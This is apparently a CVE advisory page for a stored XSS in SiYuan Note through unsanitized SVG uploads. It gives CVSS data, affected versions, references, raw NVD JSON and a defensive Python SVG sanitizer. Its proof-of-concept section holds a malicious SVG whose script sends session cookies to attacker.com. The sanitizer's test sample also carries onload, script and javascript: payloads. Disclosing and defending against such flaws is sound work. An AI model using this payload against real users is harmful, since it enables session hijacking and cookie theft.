Security Vulnerability Report
CVE-2026-23645 CVSS 6.1 MEDIUM

CVE-2026-23645

Published: 2026-01-16 20:15:50
Last Modified: 2026-01-30 19:32:12

Description

SiYuan is self-hosted, open source personal knowledge management software. Prior to 3.5.4-dev2, a Stored Cross-Site Scripting (XSS) vulnerability exists in SiYuan Note. The application does not sanitize uploaded SVG files. If a user uploads and views a malicious SVG file (e.g., imported from an untrusted source), arbitrary JavaScript code is executed in the context of their authenticated session. This vulnerability is fixed in 3.5.4-dev2.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:b3log:siyuan:3.5.4:dev1:*:*:*:*:*:* - VULNERABLE
SiYuan Note < 3.5.4-dev2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<!-- CVE-2026-23645 PoC: Malicious SVG file for SiYuan Note XSS -->
<svg xmlns="http://www.w3.org/2000/svg">
  <script>
    <![CDATA[
    // Steal session cookies and send to attacker server
    var cookies = document.cookie;
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'https://attacker.com/steal?c=' + encodeURIComponent(cookies), true);
    xhr.send();
    // Alternative payload: Display fake login prompt to phish credentials
    alert('Session hijacking payload executed!');
    console.log('Stolen cookies:', cookies);
    ]]>
  </script>
  <rect width="100" height="100" fill="red"/>
  <text x="10" y="50">Malicious SVG - XSS</text>
</svg>
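
The control missing in the affected versions is sanitization of SVG before it is stored or served. The following is an added example, not SiYuan's code and not the upstream patch: an allowlist sanitizer built on Python's standard library. The element allowlist, the function name `sanitize_svg` and the sample document are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# Static drawing elements only (lower-cased local names). Anything not listed,
# including script, foreignObject, style, a and animation elements, is removed.
ALLOWED = {"svg", "g", "defs", "title", "desc", "path", "rect", "circle",
           "ellipse", "line", "polyline", "polygon", "text", "tspan",
           "lineargradient", "radialgradient", "stop", "clippath", "use"}

def _local(name):
    """Strip the '{namespace}' prefix ElementTree puts on tag/attribute names."""
    return name.rsplit("}", 1)[-1].lower()

def sanitize_svg(svg_text):
    """Return (clean_svg, findings); raise ValueError for non-SVG or DTD input."""
    lowered = svg_text.lower()
    if "<!doctype" in lowered or "<!entity" in lowered:
        raise ValueError("DTD/entity declarations are not accepted")
    ET.register_namespace("", SVG_NS)  # serialize without ns0: prefixes
    root = ET.fromstring(svg_text)     # comments and PIs are dropped by the parser
    if _local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    findings = []
    # Pass 1: remove every element (with its subtree) that is not allowlisted.
    for parent in list(root.iter()):
        for child in list(parent):
            if _local(child.tag) not in ALLOWED:
                findings.append("element:" + _local(child.tag))
                parent.remove(child)
    # Pass 2: drop event handlers and any href that is not a same-document '#id'.
    for el in root.iter():
        for attr in list(el.attrib):
            name = _local(attr)
            if name.startswith("on"):
                findings.append("attr:" + name)
                del el.attrib[attr]
            elif name == "href" and not el.attrib[attr].strip().startswith("#"):
                findings.append("href:" + _local(el.tag))
                del el.attrib[attr]
    return ET.tostring(root, encoding="unicode"), findings

# Constructed sample (not from the advisory): one of each active construct.
SAMPLE = """<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">
  <script>alert(2)</script>
  <a href="javascript:alert(3)"><text x="10" y="50">link</text></a>
  <use href="https://example.invalid/x.svg#y"/>
  <rect width="100" height="100" fill="red"/>
</svg>"""

if __name__ == "__main__":
    print(sanitize_svg(SAMPLE))
```

The findings list doubles as a detection signal: a non-empty list on upload is worth logging even when the cleaned file is accepted.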

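References

https://github.com/siyuan-note/siyuan/commit/11115da3d0de950593ee4ce375cf7f9018484388 (Patch)
https://github.com/siyuan-note/siyuan/issues/16844 (Issue Tracking, Patch)
https://github.com/siyuan-note/siyuan/security/advisories/GHSA-pcjq-j3mq-jv5j (Exploit, Vendor Advisory, Patch)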

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23645", "sourceIdentifier": "[email protected]", "published": "2026-01-16T20:15:49.880", "lastModified": "2026-01-30T19:32:11.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SiYuan is self-hosted, open source personal knowledge management software. Prior to 3.5.4-dev2, a Stored Cross-Site Scripting (XSS) vulnerability exists in SiYuan Note. The application does not sanitize uploaded SVG files. If a user uploads and views a malicious SVG file (e.g., imported from an untrusted source), arbitrary JavaScript code is executed in the context of their authenticated session. This vulnerability is fixed in 3.5.4-dev2."}, {"lang": "es", "value": "SiYuan es un software de gestión de conocimiento personal de código abierto y autoalojado. Antes de la versión 3.5.4-dev2, existe una vulnerabilidad de cross-site scripting (XSS) almacenado en SiYuan Note. La aplicación no sanitiza los archivos SVG subidos. Si un usuario sube y visualiza un archivo SVG malicioso (por ejemplo, importado de una fuente no confiable), se ejecuta código JavaScript arbitrario en el contexto de su sesión autenticada. 
Esta vulnerabilidad se ha corregido en la versión 3.5.4-dev2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", 
"integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.4", "matchCriteriaId": "D3F308D6-1396-4488-9382-0EE485C9289C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:b3log:siyuan:3.5.4:dev1:*:*:*:*:*:*", "matchCriteriaId": "2CB8C612-80B3-4D14-9454-D444D227FA4B"}]}]}], "references": [{"url": "https://github.com/siyuan-note/siyuan/commit/11115da3d0de950593ee4ce375cf7f9018484388", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/siyuan-note/siyuan/issues/16844", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-pcjq-j3mq-jv5j", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory", "Patch"]}]}}